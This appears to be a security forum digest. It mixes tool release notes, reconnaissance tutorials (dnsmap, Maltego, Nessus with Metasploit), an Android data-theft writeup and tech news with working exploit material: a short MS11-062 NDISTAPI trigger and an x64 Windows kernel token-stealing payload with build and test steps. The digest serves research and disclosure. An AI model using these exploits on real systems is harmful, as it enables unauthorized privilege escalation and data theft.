Nytro

Recuva File Recovery Accidentally deleted an important file? Lost something important when your computer crashed? No problem! Recuva recovers files deleted from your Windows computer, Recycle Bin, digital camera card, or MP3 player. And it's free! v1.41.537 (10 Oct 2011) - Added content searching for specific text in deleted files. - Added regular expression matching to the filter. - Added preliminary support for Windows 8. - Improved support for BartPE (added new folder creation). - Fixed filter drop down highlight issue. - Improved recovery of compressed files from drives with non-standard cluster size. - Many minor UI improvements. - Latvian language added. Download: http://www.piriform.com/recuva/download

[C++] Simple Code Virtualization (Virtual Machine / Emulator) Original code by: abhe Ported by: steve10120 at ic0de.org Thanks to Edi for help with inst_table Original: ic0de.org /* Original code by: abhe Ported by: steve10120@ic0de.org Thanks to Edi for help with inst_table */ #include <Windows.h> #include <iostream> int const REGISTER_EAX = 0; int const REGISTER_ECX = 1; int const REGISTER_EDX = 2; int const REGISTER_EBX = 3; int const REGISTER_ESP = 4; int const REGISTER_EBP = 5; int const REGISTER_ESI = 6; int const REGISTER_EDI = 7; int const REGISTER_NOP = 8; typedef struct _VMCONTEXT { DWORD EIP; DWORD Reg[8]; } VMCONTEXT, *PVMCONTEXT; typedef void (VM_FUNCTION_CALL)(PVMCONTEXT c); typedef struct _INST { VM_FUNCTION_CALL* FunctionCall; } INST, *PINST; void AddCode(PVMCONTEXT c, BYTE n) { c->EIP += n; } void VRetn(PVMCONTEXT c) { } void VJmp(PVMCONTEXT c) { DWORD imm32; c->EIP++; imm32 = *(PDWORD)c->EIP; c->EIP = imm32; } void VPUSHImm(PVMCONTEXT c) { DWORD imm32; c->EIP++; imm32 = *(PDWORD)c->EIP; AddCode(c, 4); *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } void VPUSHReg(PVMCONTEXT c) { BYTE regflag; DWORD imm32; c->EIP++; regflag = *(PBYTE)c->EIP; AddCode(c, 1); if ( regflag < 8 ) { imm32 = c->Reg[regflag]; *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } } void VPUSHMem(PVMCONTEXT c) { DWORD mem32; DWORD imm32; c->EIP++; mem32 = *(PDWORD)c->EIP; imm32 = *(PDWORD)mem32; AddCode(c, 4); *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } void VPOPReg(PVMCONTEXT c) { BYTE regflag; DWORD imm32; c->EIP++; regflag = *(PBYTE)c->EIP; AddCode(c, 1); if ( regflag < 8 ) { imm32 = *(PDWORD)c->Reg[REGISTER_ESP]; c->Reg[REGISTER_ESP] -= 4; c->Reg[regflag] = imm32; } } void VPOPMem(PVMCONTEXT c) { DWORD imm32; DWORD mem32; imm32 = *(PDWORD)c->Reg[REGISTER_ESP]; c->Reg[REGISTER_ESP] -= 4; mem32 = *(PDWORD)c->EIP; AddCode(c, 4); *(PDWORD)mem32 = imm32; } void VMovRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] = c->Reg[SrcReg]; } void VMovRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] = imm32; } void VMovRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] = *(PDWORD)mem32; } void VADDRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] += c->Reg[SrcReg]; } void VADDRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] += imm32; } void VADDRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] += *(PDWORD)mem32; } void VSUBRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] -= c->Reg[SrcReg]; } void VSUBRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] -= imm32; } void VSUBRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] -= *(PDWORD)mem32; } void VMulEaxReg(PVMCONTEXT c) { BYTE SrcReg; c->EIP++; SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( SrcReg < 8 ) c->Reg[REGISTER_EAX] *= c->Reg[SrcReg]; } void VDivEaxReg(PVMCONTEXT c) { BYTE SrcReg; c->EIP++; SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( SrcReg < 8 ) { c->Reg[REGISTER_EAX] /= c->Reg[SrcReg]; c->Reg[REGISTER_EAX] %= c->Reg[SrcReg]; } } void VANDRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] &= c->Reg[SrcReg]; } void VAndRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] &= imm32; } void VAndRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] &= *(PDWORD)mem32; } void VORRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) & ( SrcReg < 8 ) ) c->Reg[DestReg] |= c->Reg[SrcReg]; } void VORRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] |= imm32; } void VORRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] |= *(PDWORD)mem32; } const INST inst_table[23] = {{VRetn},{VJmp},{VPUSHImm},{VPUSHReg},{VPUSHMem},{VPOPReg},{VPOPMem},{VMovRegReg}, {VMovRegImm},{VMovRegMem},{VADDRegReg},{VADDRegImm},{VADDRegMem},{VSUBRegReg},{VSUBRegImm},{VSUBRegMem}, {VMulEaxReg},{VDivEaxReg},{VANDRegReg},{VAndRegImm},{VORRegReg},{VORRegImm},{VORRegMem}}; VMCONTEXT ExecuteVM(LPVOID Code, DWORD Size) { INST Ins; BYTE Op; LPVOID Stack; VMCONTEXT Context; for (Op = 0; Op < 7; Op++) Context.Reg[Op] = 0; Stack = GlobalAlloc(GMEM_FIXED, 1024 * 1024 * 2); if (Stack) { Context.Reg[REGISTER_ESP] = (DWORD)Stack; Context.EIP = (DWORD)Code; while (Context.EIP <= ((DWORD)Code + Size - 1)) { Op = *(PBYTE)Context.EIP; Ins = inst_table[Op]; Ins.FunctionCall(&Context); if (Op == 0) break; } GlobalFree(Stack); } return Context; } int main(void) { BYTE Code[13] = {0x08,0x00,0x05,0x00,0x00,0x00, // mov eax, 5 0x0B,0x00,0x05,0x00,0x00,0x00, // add eax, 5 0x00}; // retn VMCONTEXT Context = ExecuteVM(&Code, sizeof(Code)); std::cout << Context.Reg[REGISTER_EAX] << std::endl; return 0; } Sursa: ic0de.org

Building small exe in VC++ 2010 li0n.coder hi all this is my first post at this amazing forum in this tutorial i will guide you step by step to make smallest possible native win32 application by using Visual C++ 2010 Express the reason for this tutorial is that VS 6.0 is very old but most people still use it because it makes small native exe also most projects were made by VS 6.0 so it is hard for some to convert it to the new edition of VS 1- download and install Visual C++ 2010 Express (free) 2- File>New>project 3- choose win32 project , let us name it smallexe, then press ok 4- new windows will pop up, click next 5- check empty project then click finish 6- go to project>add new item>c++ file> let us name it main , then press ok 7- paste this code which show simple message box #include <windows.h> int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBoxA(NULL,"my small exe!","info",0); return 0; } 8- now go to project>properties 9- press configuration manger and set active solution configuration to "release" then close 10- [optional step] many codes around will generate errors when you build it , simply because they were written in VS 6.0 and they don't support Unicode, if you don't know how to convert the project to Unicode we can disable this feature configuration properties>character set>change to "not set" 11- go to C/C++>optimization>optimization>choose minimize size 12- go to C/C++>code generation>run time library>choose multi threaded dll (/MT) why ? this option will Remove dependency of msvcr100.dll which is not available natively on windows xp 13-go to linker>manifest file>generate manifest>choose no 14-go to linker>debugging>generate debug info>choose no 15-go to linker>advanced>entry point> write WinMain 16- build the project yaaaay 2.5kb app, that run without any dependency !! when you write bigger project use minicrt.lib[download from attachments], it also will decrease the size linker>input>additional dependencies> write minicrt.lib; hope it works with you guys Sursa: ic0de.org

Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062) #include "stdio.h" #include "windows.h" #define NTSTATUS int int main(int argc, char* argv[]) { PULONG pShellcode; char InputBuffer[4]={0}; ULONG AllocationSize,dwReturnSize; HANDLE dev_handle; SC_HANDLE hscmHandle = NULL; SC_HANDLE hscDriver = NULL; PROCESS_INFORMATION pi; STARTUPINFOA stStartup; printf("\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n"); dev_handle = CreateFile("\\\\.\\NDISTAPI" ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0); DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0x80000000,0,&dwReturnSize, NULL); return 1; } Via: http://www.softrce.net/archives/405 Sursa: http://www.ic0de.org/showthread.php?10860-SRC-Microsoft-Windows-NDISTAPI-Local-Privilege-Escalation-Vulnerability-%28MS11-062%29

Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial Nessus the best vulnerability scanner, management and assessment tool and the metasploit the best database, software, program and tool for exploits. They both are the best in their domain but when we connect them to each other there is a extra smartness and purity occur in short we will make a best penetration testing tool for exploit an operating system by using Nessus with Metasploit. However there is a different way to do so and we have shared different methods and tutorials to integrate Metasploit with nessus or vice versa. In this article we will discuss the video tutorial in which I will show you the power of Nessus and metasploit. This tutorial is little from other tutorials that has been discussed before about Nessus, Metasploit, N map and Nexpose. Here is the list of some tutorials and than I will show you the difference between them to this tutorial. Metasploit Autopwn With Nessus Backtrack 5 Tutorial Integrate Nessus With Metasploit- Tutorial Nessus Setup On Backtrack 5 Metasploit Remote Desktop Exploit-Backtrack 5 Below is the tutorial in which I will show some advance feature of nessus like Filter feature to get the exploit available on the public and by using Metasploit I will show you how to exploit a computer or a vulnerability that has been found by nessus. Video: http://www.youtube.com/watch?feature=player_embedded&v=2zBqnHrUWDU#! Sursa: Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security

Dnsmap - DNS Network Mapper Information is very important for performing penetration testing, on a vary first step ethical hackers/penetration tester try to get the maximum information about the target. The steps required for information gathering or footprinting has been discussed on earlier article click here to read. After all there are some automatic tools present to gather the information and these tools also help out to map the victim network by using their officials websites.In this article we will cover about DNSMAP. Dnsmap is a passive network mapper and normally known as subdomain brute forcer, it originally released on 2006, it used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. Dnsmap is a open source and tested on linux based operating system although it can be used on FreeBSD and windows plate form by using Cygwin, dnsmap was included in Backtrack 2, 3 and 4 Key Features IPv6 support Makefile included delay option (-d) added. This is useful in cases where dnsmap is killing your bandwidth ignore IPs option (-i) added. This allows ignoring user-supplied IPs from the results. Useful for domains which cause dnsmap to produce false positives changes made to make dnsmap compatible with OpenDNS disclosure of internal IP addresses (RFC 1918) are reported updated built-in wordlist included a standalone three-letter acronym (TLA) subdomains wordlist domains susceptible to “same site” scripting are reported completion time is now displayed to the user mechanism to attempt to bruteforce wildcard-enabled domains unique filename containing timestamp is now created when no specific output filename is supplied by user various minor bugs fixed DNSMAP Tutorial After downloading extract it now open terminal and go on the place where you have extract dnsmap and follow these steps: Type gcc dnsmap.c -o dnsmap or g++ dnsmap.c -o dnsmap make sure you have installed C compiler After this make it executable type chmod +x dnsmap And than run it by typing ./dnsmap domain.com $ dnsmap baidu.com dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org) [+] searching (sub)domains for baidu.com using built-in wordlist accounts.baidu.com IP address #1: 10.11.252.74 events.baidu.com IP address #1: 202.108.23.40 finance.baidu.com IP address #1: 60.28.250.196 Download: http://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz Sursa: http://www.ehacking.net/2011/02/dnsmap-dns-network-mapper.html

Maltego- Information Gathering Tool Tutorial This article is link with our series article on footprinting (Information gathering) for previous story click here. Now beside whois,Nslookup and tracert command there are some tools that available on market to perform footprinting professionally, these tools provide a wide range of option and techniques to perform a valuable footprinting. In this article we will talk about Maltego, Maltego is an open source forensic application that are used to gather maximum information for the purpose of forensic and pen testing, it can represent a result in a very formal and easy to understand format. It is available in two flavours one is community edition and other is commercial version. You can download Maltego on your windows based operating system and for Linux based operating system. Click here to grab your copy. This is the top and main navigation bar, there are two tabs one is investigate and the other is manage tab. Now we are on the manage tab, where we can see different entities and transforms, but the point of consideration is Palette option turn it on. Palette option is the main option from you have to drag your main task, for example if you want to gather a information about a person than drag the person option and enter the name of the person to whom you are going to gather information. After all right click on a person and suppose we have to find the email addresses of a related person, than in the email option click all in the set and your scan will began. Output is depend on your computer processing speed and your internet speed. Now we have found a related email addresses. Is this enough? No there are more amazing options present on maltego like to your can gather information about DNS server. For this purpose see the video demonstration of maltego. Video: http://www.youtube.com/watch?v=QMypTK-dVaI&feature=player_embedded#! Sursa: Maltego- Information Gathering Tool Tutorial | Ethical Hacking-Your Way To The World Of IT Security

Android Data Stealing with Metasploit by creatures November 15, 2011 This vulnerability was found by Thomas Cannon back in 2010, I think. I just thought this is interesting to share to Android users . I tried this exploit on Marvell tablets with Android versions 1.6 – 2.2. The big one is using 1.6 and small is using 2.2. For some reason this tablet has been customize by a private company which is used for a project. Screenshot1: http://www.theprojectxblog.net/wp-content/uploads/2011/11/319-1024x768.jpg Firing up metasploit then using android_htmlfileprovider Screenshot2: http://www.theprojectxblog.net/wp-content/uploads/2011/11/305-1024x768.jpg Screenshot3: http://www.theprojectxblog.net/wp-content/uploads/2011/11/300-768x1024.jpg When the user accesses the malicious url that we have setup, consequences are the attacker will able to get any data including any sensitive data from/proc, browser files such as history,bookmarks and maybe even sessions. Also you can grab data from sdcards, As explained by Thomas Cannon in his blog: The Android browser doesn’t prompt the user when downloading a file, for example"payload.html", it automatically downloads to /sdcard/download/payload.html It is possible, using JavaScript, to get this payload to automatically open, causing the browser to render the local file. When opening an HTML file within this local context, the Android browser will run JavaScript without prompting the user. While in this local context, the JavaScript is able to read the contents of files (and other data). Screenshot4: http://www.theprojectxblog.net/wp-content/uploads/2011/11/293-1024x768.jpg Majority are now using Android Phones and Tablets especially here in PHL. Google should not be the only one who needs to fix this but also other companies producing or manufacturing Android Phones and Tablets with same version but most companies that I know just dont give a damn about fixing and updating, etc. PS: I also tried it on android 2.3 Archos and the exploit doesnt work Take care guys and be aware Sursa: http://www.theprojectxblog.net/android-data-stealing-with-metasploit/

TU -> Server 1 -> ... -> Server n -> Victima Victima -> Server n -> ... -> Server 1 -> TU Asa cum datele ajung la tine, indiferent prin cate "filtre" trec, asa poate oricine sa ajunga la tine, ca si datele, pas cu pas... Cat despre moda asta cu "spartul" site-urilor mi se pare o prostie. Insa cea mai mare prostie e ca dupa ce te caci, il mai iei si la palme. Adica dupa ce ca faci ceva ce nu e permis de lege (acces neautorizat), te mai si lauzi la toata lumea ca tu "1337"-le ai fost.

Sunt niste porcarii. Videoclipurile nu explica nimic, sunt "demonstrative" (nici asta nu stiu daca ar fi corect sa spun) iar acel articol parca e scris de un pusti care a folosit 2 cryptere si poate se crede zmeu. Una era sa explice cobein, Karcrack, steve (daca nu erau ei si inca cativa cu idei geniale nu existau acum atatea cryptere, desi ideile originale sunt ale lui Matt Pietrek cu multi, multi ani in urma) sau alte persoane care cel putin stiu care e structura unui executabil, alta e sa explice acel personaj care nu este altceva decat un utilizator casnic...

x64 Kernel Privilege Escalation March 7, 2011 Caution: Mucking around in the kernel like this carries a high risk of causing the Blue Screen of Death (BSOD) and possible data loss. Testing in a virtual machine or other non-production system is highly recommended. Introduction he user account and access privileges associated with a running Windows process are determined by a kernel object called a token. The kernel data structures that keep track of various process-specific data contain a pointer to the process’s token. When the process attempts to perform various actions, such as opening a file, the account rights and privileges in the token are compared to the privileges required, to determine if access should be granted or denied. Because the token pointer is simply data in kernel memory, it is a trivial matter for code executing in kernel mode to change it to point to a different token and therefore grant the process a different set of privileges. This underscores the importance of securing the system against vulnerabilities that can be exploited by local users to execute code in the kernel. This article will provide an explanation and sample exploit code for elevating a process to Administrator-level privileges. Modified versions of the device driver and test program from my device driver development article will be used as a means of injecting executable code into the kernel. Details For a walk-through we will start up a command prompt (cmd.exe) with standard user privileges, and then use the kernel debugger to manually locate the token of the highly privileged System process and give the running cmd.exe process System-level privileges. First, find the hexadecimal address of the System process: kd> !process 0 0 System PROCESS fffffa8003cf11d0 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00187000 ObjectTable: fffff8a0000018b0 HandleCount: 687. Image: System This points to an _EPROCESS structure with many fields which we can dump as follows: kd> dt _EPROCESS fffffa8003cf11d0 nt!_EPROCESS +0x000 Pcb : _KPROCESS +0x160 ProcessLock : _EX_PUSH_LOCK +0x168 CreateTime : _LARGE_INTEGER 0x1cbdcf1`54a2bf4a +0x170 ExitTime : _LARGE_INTEGER 0x0 +0x178 RundownProtect : _EX_RUNDOWN_REF +0x180 UniqueProcessId : 0x00000000`00000004 Void +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`05b3c828 - 0xfffff800`02e71b30 ] +0x198 ProcessQuotaUsage : [2] 0 +0x1a8 ProcessQuotaPeak : [2] 0 +0x1b8 CommitCharge : 0x1e +0x1c0 QuotaBlock : 0xfffff800`02e50a80 _EPROCESS_QUOTA_BLOCK +0x1c8 CpuQuotaBlock : (null) +0x1d0 PeakVirtualSize : 0xf70000 +0x1d8 VirtualSize : 0x870000 +0x1e0 SessionProcessLinks : _LIST_ENTRY [ 0x00000000`00000000 - 0x0 ] +0x1f0 DebugPort : (null) +0x1f8 ExceptionPortData : (null) +0x1f8 ExceptionPortValue : 0 +0x1f8 ExceptionPortState : 0y000 +0x200 ObjectTable : 0xfffff8a0`000018b0 _HANDLE_TABLE +0x208 Token : _EX_FAST_REF +0x210 WorkingSetPage : 0 [...] The token is a pointer-sized value located at offset 0x208 and we can dump the value as follows: kd> dq fffffa8003cf11d0+208 L1 fffffa80`03cf13d8 fffff8a0`00004c5c You may have noticed in the _EPROCESS structure that the Token field is declared as an _EX_FAST_REF, rather than the expected _TOKEN structure. The _EX_FAST_REF structure is a trick that relies on the assumption that kernel data structures are required to be aligned in memory on a 16-byte boundary. This means that a pointer to a token or any other kernel object will always have the last 4 bits set to zero (in hex the last digit will always be zero). Windows therefore feels free to use the low 4 bits of the pointer value for something else (in this case a reference count that can be used for internal optimization purposes). kd> dt _EX_FAST_REF nt!_EX_FAST_REF +0x000 Object : Ptr64 Void +0x000 RefCnt : Pos 0, 4 Bits +0x000 Value : Uint8B To get the actual pointer from an _EX_FAST_REF, simply change the last hex digit to zero. To accomplish this programmatically, mask off the lowest 4 bits of the value with a logical-AND operation. kd> ? fffff8a0`00004c5c & ffffffff`fffffff0 Evaluate expression: -8108898235312 = fffff8a0`00004c50 We can display the token with dt _TOKEN or get a nicer display with the !token extension command: kd> !token fffff8a0`00004c50 _TOKEN fffff8a000004c50 TS Session ID: 0 User: S-1-5-18 Groups: 00 S-1-5-32-544 Attributes - Default Enabled Owner 01 S-1-1-0 Attributes - Mandatory Default Enabled 02 S-1-5-11 Attributes - Mandatory Default Enabled 03 S-1-16-16384 Attributes - GroupIntegrity GroupIntegrityEnabled Primary Group: S-1-5-18 Privs: 02 0x000000002 SeCreateTokenPrivilege Attributes - 03 0x000000003 SeAssignPrimaryTokenPrivilege Attributes - 04 0x000000004 SeLockMemoryPrivilege Attributes - Enabled Default [...] Note that the Security Identifier (SID) with value S-1-5-18 is the built-in SID for the Local System account (see the well-known SIDs reference from Microsoft). The next step is to locate the _EPROCESS structure for the cmd.exe process and replace the Token pointer at offset 0x208 with the address of the System token: kd> !process 0 0 cmd.exe PROCESS fffffa80068ea060 SessionId: 1 Cid: 0d0c Peb: 7fffffdf000 ParentCid: 094c DirBase: 1f512000 ObjectTable: fffff8a00b8b5a10 HandleCount: 18. Image: cmd.exe kd> eq fffffa80068ea060+208 fffff8a000004c50 Finally, go to the command prompt and use the built-in whoami command to display the user account. You can also confirm by running commands or accessing files that you know should require Administrator privileges. Exploit Code Implementing the above procedure in code is short and sweet, with only minor differences for x64 as compared to the x86 privilege escalation codes that have been around for years. I disassembled the nt!PsGetCurrentProcess function to see how to get the _EPROCESS address of the current process. The _EPROCESS structures of all running processes on the system are linked together in a circular doubly-linked list using the ActiveProcessLinks member. We can locate the System process by following these links and looking for process ID 4. ;priv.asm ;grant SYSTEM account privileges to calling process [BITS 64] start: ; db 0cch ;uncomment to debug mov rdx, [gs:188h] ;get _ETHREAD pointer from KPCR mov r8, [rdx+70h] ;_EPROCESS (see PsGetCurrentProcess function) mov r9, [r8+188h] ;ActiveProcessLinks list head mov rcx, [r9] ;follow link to first process in list find_system_proc: mov rdx, [rcx-8] ;offset from ActiveProcessLinks to UniqueProcessId cmp rdx, 4 ;process with ID 4 is System process jz found_it mov rcx, [rcx] ;follow _LIST_ENTRY Flink pointer cmp rcx, r9 ;see if back at list head jnz find_system_proc db 0cch ;(int 3) process #4 not found, should never happen found_it: mov rax, [rcx+80h] ;offset from ActiveProcessLinks to Token and al, 0f0h ;clear low 4 bits of _EX_FAST_REF structure mov [r8+208h], rax ;replace current process token with system token ret I’m using the Netwide Assembler (NASM) in Cygwin to assemble the code (native win32 NASM binaries are also available). Build with: nasm priv.asm This will generate a raw binary output file called priv (with no file extension). Note that NASM generates the two-byte opcode 0xCD 0x03 for the int 3 instruction rather than the standard one-byte 0xCC debugger breakpoint. This causes problems in the kernel debugger because it assumes that the next instruction is only one byte ahead in memory, not two bytes. This can be worked around if necessary by manually adjusting the RIP register by one byte after the breakpoint hits, but it’s better to just generate the correct opcode in the first place with db 0cch. Testing My device driver development article presents a sample device driver which accepts a string from a user-mode process via a Device I/O Control interface, and simply prints the string to the kernel debugger. To test the above exploit code, I modified the driver to execute the passed-in data as code instead: void (*func)(); //execute code in buffer func = (void(*)())buf; func(); This of course requires that the memory page be marked executable, otherwise Data Execution Prevention (DEP) would trigger an exception. I was actually surprised that the buffer passed into an IOCTL interface (using METHOD_DIRECT) was executable by default. I’m not sure if this will always be the case, and I believe it has to do with the use of large pages in kernel memory on x64 systems, which make memory protections impractical (memory can only be set as non-executable at the granularity of the virtual memory page size). I then modified the user-mode test program to use the following function to read the data from the priv binary file rather than passing in a hard-coded string: //allocates buffer and reads entire file //returns NULL on error //stores length to bytes_read if non-NULL char *read_file_data(char *filename, int *bytes_read) { char *buf; int fd, len; fd = _open(filename, _O_RDONLY | _O_BINARY); if (-1 == fd) { perror("Error opening file"); return NULL; } len = _filelength(fd); if (-1 == len) { perror("Error getting file size"); return NULL; } buf = malloc(len); if (NULL == buf) { perror("Error allocating memory"); return NULL; } if (len != _read(fd, buf, len)) { perror("error reading from file"); return NULL; } _close(fd); if (bytes_read != NULL) { *bytes_read = len; } return buf; } Finally, I also modified the test program to launch a command prompt in a separate process after executing the exploit code via the driver: //launch command prompt (cmd.exe) as new process void run_cmd() { STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); if (!CreateProcess(L"c:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { debug("error spawning cmd.exe"); } else { printf("launched cmd.exe with process id %d\n", pi.dwProcessId); } } The new command prompt process inherits the token of the test program process, which has been elevated to the System token. Sursa: http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation

Full Android source code released By Chris Duckett November 14, 2011, 4:02 PM PST Takeaway: The source code for Android 4.x Ice Cream Sandwich and Android 3.x Honeycomb has been released on Google’s Android open-source project Git servers. For Ice Cream Sandwich, the source code is version 4.0.1, the version that will run on the upcoming Galaxy Nexus handset. A build target for the handset is included in the release. A full history of the Android source code is included, which means that sources for Honeycomb are available, but those files have not been paired with a Honeycomb release. The official announcement states that as Honeycomb was a little incomplete, Google wants developers to focus on Ice Cream Sandwich. Google had previously refused to release the Honeycomb source, saying that Honeycomb was not ready to be customised in the manner of the Android 2.x series. With the Ice Cream Sandwich source available, third-party vendors will now be able to modify and target the operating system. Research In Motion (RIM) has said previously that its Android player for the new BBX operating system could not target Honeycomb applications because the Android source was not freely available. The code can be downloaded from Android’s Git servers. Download: http://source.android.com/source/downloading.html Sursa: http://www.techrepublic.com/blog/australia/full-android-source-code-released/283

HTML5, CSS3, and related technologies Rob Larsen, Interface Architect, Isobar Summary: Many technologies are informally lumped under the "HTML5" banner. This article helps clear up any confusion about what's in and what's out of the HTML specification, while shining light on the technologies themselves, such as the many CSS3 modules. Web standard development and marketing It's a great time to be a web developer. After a long period of hibernation, the standards bodies and browser vendors have been extremely busy over the past few years, generating a torrent of exciting technology. Developers are greedily seizing on this work, producing demos and full-blown applications at a steady pace. Fed by this activity and further boosted by the growth of their standards-capable mobile browsers, companies like Google and Apple are using these new standards to market their products and services. The wider press is also seizing on this wave and pushing standards hype well beyond the normal circle of web developers and browser vendors. This volume of discussion has obvious benefits, of course. People getting excited about web standards is a positive development for everyone in the industry. From that perspective, the persistent use of blanket terms, especially HTML5, as a sort of brand shorthand for "emerging web technology" is a useful shortcut. It allows nontechnical people to grasp—in a generalized way—the exciting work being done in the standards space right now. Interestingly, even the W3C has gotten into the act, using HTML5 and its associated logo (see Figure 1) to publicize the "web platform." On the downside, the volume of the specification work being done, coupled with the fast-and-loose labeling has created a bit of confusion, even in the developer community, surrounding the specifications themselves. Unless you're paying close attention to the volume of work, there's a real chance you'll get lost in the acronym soup of standards being generated. This article helps to clear up any confusion surrounding the ongoing standards work. It outlines the major standards efforts and provides a handy guide to the technologies themselves. Articol: www.ibm.com/developerworks/web/library/wa-webstandards/index.html

How We Do Language Design at Microsoft (C#,Visual Basic,F#) Speakers: Alex Turner , Donald Syme , Lisa Feigenbaum , Lucian Wischik Hear from the C#,Visual Basic,and F# language designers themselves,about how we create the .NET Framework languages at Microsoft. Where do we get ideas? How do we incorporate new paradigms without breaking the existing languages? Where will we go in the future,and how will we get there? We talk about all these topics and more. Come ready for an interactive session,and get your questions answered by the team! Download: http://media.ch9.ms/teched/na/2011/wmv-hq/DEV328-HD.wmv Online: http://channel9.msdn.com/Events/TechEd/NorthAmerica/2011/DEV328?utm_source=dlvr.it&utm_medium=twitter

Setiri - Advances in trojan technology Authors: Haroon Meer, Jaco van Graan Size: 1.1 MB Download: http://www.blackhat.com/presentations/bh-asia-02/Sensepost/bh-asia-02-sensepost-notes.pdf

Firewall Log Watch 1.3 Authored by Boris Wesslowski | Site kyb.uni-stuttgart.de fwlogwatch is a packet filter and firewall log analyzer with support for Linux ipchains, Linux netfilter/iptables, Solaris/BSD/HP-UX/IRIX ipfilter, Cisco IOS, Cisco PIX/ASA, Netscreen, Elsa Lancom router, and Snort IDS log files. It can output its summaries in text and HTML and has a lot of options. fwlogwatch also features a realtime anomaly response capability with a Web interface. Changes: This release adds IPv6 support for netfilter, dns cache initialization, and ASA parser extensions. Download: http://packetstormsecurity.org/files/download/106996/fwlogwatch-1.3.tar.gz

